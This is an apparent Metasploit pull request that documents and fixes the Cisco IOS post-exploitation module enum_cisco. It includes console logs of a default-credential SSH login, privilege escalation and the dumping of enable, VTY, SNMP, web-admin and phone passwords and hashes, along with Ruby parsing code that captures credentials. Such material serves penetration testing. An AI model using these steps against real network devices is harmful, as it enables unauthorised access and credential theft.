### PR TITLE
cisco docs and bug fixes

### DIFF
--- a/documentation/modules/post/cisco/gather/enum_cisco.md
+++ b/documentation/modules/post/cisco/gather/enum_cisco.md
@@ -1,0 +1,171 @@
+## Vulnerable Application
+
+  This module has been tested on the following hardware/OS combinations.
+
+  * IOS
+    * Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
+    * UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
+
+  The Catalyst 2950 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/cisco-2950.config)
+
+  The UC520 config can be found [here](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/cisco-uc520.config)
+
+  This module will look for the follow parameters which contain credentials:
+
+  * IOS
+    * enable
+    * snmp-server
+    * VTY
+    * WiFi
+    * VPN
+    * username
+    * PPP
+    * web admin
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a shell
+  3. Do: ```use post/cisco/gather/enum_cisco```
+  4. Do: ```set session [id]```
+  5. Do: ```set verbose true```
+  6. Do: ```run```
+
+## Scenarios
+
+### Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
+
+```
+resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (cisco.rb)> set username cisco
+username => cisco
+resource (cisco.rb)> set password cisco
+password => cisco
+resource (cisco.rb)> set rhosts 222.222.2.222
+rhosts => 222.222.2.222
+resource (cisco.rb)> run
+[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
+[*] Command shell session 1 opened (111.111.1.111:40721 -> 222.222.2.222:22) at 2019-07-20 16:29:05 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (cisco.rb)> use post/cisco/gather/enum_cisco
+resource (cisco.rb)> set session 1
+session => 1
+resource (cisco.rb)> set verbose true
+verbose => true
+resource (cisco.rb)> set enable enable
+enable => enable
+resource (cisco.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[*] Getting privilege level
+[*] The device OS is IOS
+[*] Session running in mode EXEC
+[*] Privilege level 1
+[+] version information stored in to loot, file:/root/.msf4/loot/20190720162921_default_222.222.2.222_cisco.ios.versio_081759.txt
+[*] Gathering info from show ip interface brief
+[+] Saving to /root/.msf4/loot/20190720162941_default_222.222.2.222_cisco.ios.interf_908844.txt
+[*] Gathering info from show inventory
+[+] Saving to /root/.msf4/loot/20190720162946_default_222.222.2.222_cisco.ios.hw_inv_152516.txt
+[+] Obtained higher privilege level.
+[*] Gathering info from show run
+[*] Parsing running configuration for credentials and secrets...
+[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0
+[+] 222.222.2.222:22 Decrypted Enable Password: password
+[+] 222.222.2.222:22 Username 'encrypted' with Decrypted Password: encrypted
+[+] 222.222.2.222:22 Username 'admin' with Password: admin
+[+] 222.222.2.222:22 Username 'cisco' with Password: cisco
+[+] 222.222.2.222:22 Unencrypted VTY Password: password
+[+] 222.222.2.222:22 Decrypted VTY Password: password
+[+] Saving to /root/.msf4/loot/20190720163001_default_222.222.2.222_cisco.ios.run_co_537064.txt
+[*] Gathering info from show cdp neigh
+[+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt
+[*] Post module execution completed
+[*] Starting persistent handler(s)...
+msf5 post(cisco/gather/enum_cisco) > creds
+Credentials
+===========
+
+host           origin         service  public     private                         realm  private_type        JtR Format
+----           ------         -------  ------     -------                         -----  ------------        ----------
+222.222.2.222  222.222.2.222  22/tcp   cisco      cisco                                  Password            
+222.222.2.222  222.222.2.222  22/tcp              $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0         Nonreplayable hash  md5
+222.222.2.222  222.222.2.222  22/tcp              password                               Password            
+222.222.2.222  222.222.2.222  22/tcp   encrypted  encrypted                              Password            
+222.222.2.222  222.222.2.222  22/tcp   admin      admin                                  Password            
+```
+
+### UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
+
+```
+[*] Processing cisco.rb for ERB directives.
+resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (cisco.rb)> set username cisco
+username => cisco
+resource (cisco.rb)> set password cisco
+password => cisco
+resource (cisco.rb)> set rhosts 222.222.2.222
+rhosts => 222.222.2.222
+resource (cisco.rb)> run
+[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
+[*] Command shell session 1 opened (111.111.1.111:41839 -> 222.222.2.222:22) at 2019-07-21 16:24:02 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (cisco.rb)> use post/cisco/gather/enum_cisco
+resource (cisco.rb)> set session 1
+session => 1
+resource (cisco.rb)> set verbose true
+verbose => true
+resource (cisco.rb)> set enable cisco
+enable => cisco
+resource (cisco.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[*] Getting privilege level
+[*] The device OS is IOS
+[*] Session running in mode EXEC
+[*] Privilege level 1
+[+] version information stored in to loot, file:/root/.msf4/loot/20190721162417_default_222.222.2.222_cisco.ios.versio_707957.txt
+[*] Gathering info from show login
+[+] Saving to /root/.msf4/loot/20190721162432_default_222.222.2.222_cisco.ios.login__534767.txt
+[*] Gathering info from show ip interface brief
+[+] Saving to /root/.msf4/loot/20190721162437_default_222.222.2.222_cisco.ios.interf_310865.txt
+[*] Gathering info from show inventory
+[+] Saving to /root/.msf4/loot/20190721162443_default_222.222.2.222_cisco.ios.hw_inv_238952.txt
+[+] Obtained higher privilege level.
+[*] Gathering info from show run
+[*] Parsing running configuration for credentials and secrets...
+[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
+[+] 222.222.2.222:22 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
+[+] 222.222.2.222:22 SNMP Community (RO): public
+[+] 222.222.2.222:22 SNMP Community (RW): private
+[+] 222.222.2.222:22 Website Username: cisco, of type: system, Password Hash: $1$n/n0$q6wNrBypu0GDpxzfSwGnf1
+[+] 222.222.2.222:22 ePhone Username 'phoneone' with Password: 111111
+[+] 222.222.2.222:22 ePhone Username 'phonetwo' with Password: 222222
+[+] 222.222.2.222:22 ePhone Username 'phonethree' with Password: 333333
+[+] 222.222.2.222:22 ePhone Username 'phonefour' with Password: 444444
+[+] Saving to /root/.msf4/loot/20190721162458_default_222.222.2.222_cisco.ios.run_co_918487.txt
+[*] Gathering info from show cdp neigh
+[+] Saving to /root/.msf4/loot/20190721162503_default_222.222.2.222_cisco.ios.cdp_ne_135156.txt
+[*] Gathering info from show lldp neigh
+[+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt
+[*] Post module execution completed
+[*] Starting persistent handler(s)...
+msf5 post(cisco/gather/enum_cisco) > creds
+Credentials
+===========
+
+host           origin         service  public      private                         realm  private_type        JtR Format
+----           ------         -------  ------      -------                         -----  ------------        ----------
+222.222.2.222  222.222.2.222  22/tcp   cisco       $1$n/n0$q6wNrBypu0GDpxzfSwGnf1         Nonreplayable hash  md5
+222.222.2.222  222.222.2.222  22/tcp   cisco       $1$DaqN$iP32E5WcOOui/H66R63QB0         Nonreplayable hash  md5
+222.222.2.222  222.222.2.222  22/tcp   cisco       cisco                                  Password            
+222.222.2.222  222.222.2.222  22/tcp   phoneone    111111                                 Password            
+222.222.2.222  222.222.2.222  22/tcp   phonetwo    222222                                 Password            
+222.222.2.222  222.222.2.222  22/tcp   phonethree  333333                                 Password            
+222.222.2.222  222.222.2.222  22/tcp   phonefour   444444                                 Password            
+222.222.2.222  222.222.2.222  161/udp              private                                Password            
+222.222.2.222  222.222.2.222  161/udp              public                                 Password            
+222.222.2.222  222.222.2.222  22/tcp               $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1         Nonreplayable hash  md5
+```
+

--- a/lib/msf/core/auxiliary/cisco.rb
+++ b/lib/msf/core/auxiliary/cisco.rb
@@ -273,6 +273,7 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
             cred = credential_data.dup
             cred[:jtr_format] = 'md5'
+            cred[:username] = user.to_s
             cred[:private_data] = spass
             cred[:private_type] = :nonreplayable_hash
             create_credential_and_login(cred)
@@ -283,6 +284,7 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
 
             cred = credential_data.dup
+            cred[:username] = user.to_s
             cred[:private_data] = spass
             cred[:private_type] = :password
             create_credential_and_login(cred)
@@ -294,21 +296,23 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
 
             cred = credential_data.dup
+            cred[:username] = user.to_s
             cred[:private_data] = spass
             cred[:private_type] = :password
             create_credential_and_login(cred)
           end
 
         # This regex captures ephones from Cisco Unified Communications Manager Express (CUE) which come in forms like:
-        # username &#34;phonefour&#34; password 444444
+        # username "phonefour" password 444444
         # username test password test
         # This is used for the voicemail system
-        when /^\s*username (?:&#34;)([^\s]+)(?:&#34;) password ([^\s]+)/i
+        when /^\s*username "?([\da-z]+)"? password ([^\s]+)/i
           user  = $1
           spass = $2
           print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
           store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
           cred = credential_data.dup
+          cred[:username] = user.to_s
           cred[:private_data] = spass
           cred[:private_type] = :password
           create_credential_and_login(cred)
@@ -323,6 +327,7 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
             cred = credential_data.dup
             cred[:jtr_format] = 'md5'
+            cred[:username] = user.to_s
             cred[:private_data] = spass
             cred[:private_type] = :nonreplayable_hash
             create_credential_and_login(cred)
@@ -333,6 +338,7 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
 
             cred = credential_data.dup
+            cred[:username] = user.to_s
             cred[:private_data] = spass
             cred[:private_type] = :password
             create_credential_and_login(cred)
@@ -344,6 +350,38 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
 
             cred = credential_data.dup
+            cred[:username] = user.to_s
+            cred[:private_data] = spass
+            cred[:private_type] = :password
+            create_credential_and_login(cred)
+          end
+
+        # https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/command/reference/cme_cr/cme_cr_chapter_010101.html#wp3722577363
+        when /^\s*web admin (customer|system) name ([^\s]+) (secret [0|5]|password) ([^\s]+)/i
+          puts "GOTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT"
+          login = $1
+          suser = $2
+          stype = $3
+          spass = $4
+          puts stype.to_s
+          if stype == 'secret 5'
+            print_good("#{thost}:#{tport} Web Admin Username: #{suser} Type: #{login} MD5 Encrypted Password: #{spass}")
+            store_loot("cisco.ios.web_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "web_username_password_hash.txt", "Cisco IOS Web Username and Password Hash (MD5)")
+
+            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
+            cred[:username] = suser.to_s
+            cred[:private_data] = spass
+            cred[:private_type] = :nonreplayable_hash
+            create_credential_and_login(cred)
+          end
+
+          if stype == 'secret 0' || stype == 'password'
+            print_good("#{thost}:#{tport} Web Username: #{suser} Type: #{login} Password: #{spass}")
+            store_loot("cisco.ios.web_username_password", "text/plain", thost, "#{suser}:#{spass}", "web_username_password.txt", "Cisco IOS Web Username and Password")
+
+            cred = credential_data.dup
+            cred[:username] = suser.to_s
             cred[:private_data] = spass
             cred[:private_type] = :password
             create_credential_and_login(cred)
@@ -361,6 +399,7 @@ module Auxiliary::Cisco
 
             cred = credential_data.dup
             cred[:jtr_format] = 'md5'
+            cred[:username] = suser.to_s
             cred[:private_data] = spass
             cred[:private_type] = :nonreplayable_hash
             create_credential_and_login(cred)
@@ -371,6 +410,7 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
 
             cred = credential_data.dup
+            cred[:username] = suser.to_s
             cred[:private_data] = spass
             cred[:private_type] = :password
             create_credential_and_login(cred)
@@ -382,6 +422,7 @@ module Auxiliary::Cisco
             store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
 
             cred = credential_data.dup
+            cred[:username] = suser.to_s
             cred[:private_data] = spass
             cred[:private_type] = :password
             create_credential_and_login(cred)
@@ -427,3 +468,4 @@ module Auxiliary::Cisco
 
 end
 end
+

--- a/modules/post/cisco/gather/enum_cisco.rb
+++ b/modules/post/cisco/gather/enum_cisco.rb
@@ -172,7 +172,8 @@ class MetasploitModule < Msf::Post
     ]
     priv_commands.each do |ec|
       cmd_out = session.shell_command(ec['cmd']).gsub(/#{ec['cmd']}|#{prompt}/,"")
-      next if cmd_out =~ /Invalid input|%/
+      # also look at line number so we dont invalidate large outputs by something at the end
+      next if cmd_out.split("\n").length < 2 && cmd_out =~ /Invalid input|%/
       print_status("Gathering info from #{ec['cmd']}")
       # Process configuration
       if ec['cmd'] =~/show run/
@@ -231,3 +232,4 @@ class MetasploitModule < Msf::Post
     end
   end
 end
+

--- a/spec/lib/msf/core/auxiliary/cisco_spec.rb
+++ b/spec/lib/msf/core/auxiliary/cisco_spec.rb
@@ -547,6 +547,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "1511021F0725",
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED
@@ -575,6 +576,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "1511021F0725",
             jtr_format: 'md5',
             private_type: :nonreplayable_hash,
@@ -603,6 +605,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "cisco",
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED
@@ -632,6 +635,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "1511021F0725",
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED
@@ -659,6 +663,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "1511021F0725",
             jtr_format: 'md5',
             private_type: :nonreplayable_hash,
@@ -688,6 +693,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "cisco",
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED
@@ -717,6 +723,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "1511021F0725",
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED
@@ -744,6 +751,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "1511021F0725",
             jtr_format: 'md5',
             private_type: :nonreplayable_hash,
@@ -773,6 +781,7 @@ RSpec.describe Msf::Auxiliary::Cisco do
             origin_type: :service,
             service_name: '',
             module_fullname: "auxiliary/scanner/snmp/cisco_dummy",
+            username: "someusername",
             private_data: "cisco",
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED


### PR DESCRIPTION
This PR partially sponsored by @sempervictus 

Adds docs for the Cisco post module.  Also fixes 4 bugs:
1. Wasn't properly detecting some output if "Invalid output" was at the end of the output, which could be caused by trailing characters
2. Wasn't detecting usernames for phones correctly due to non-encoding of the `"`
3. Catches cisco unified cme web admin password/hashes
4. Wasn't saving the usernames

See the docs, i've uploaded configs for the two cisco devices I have
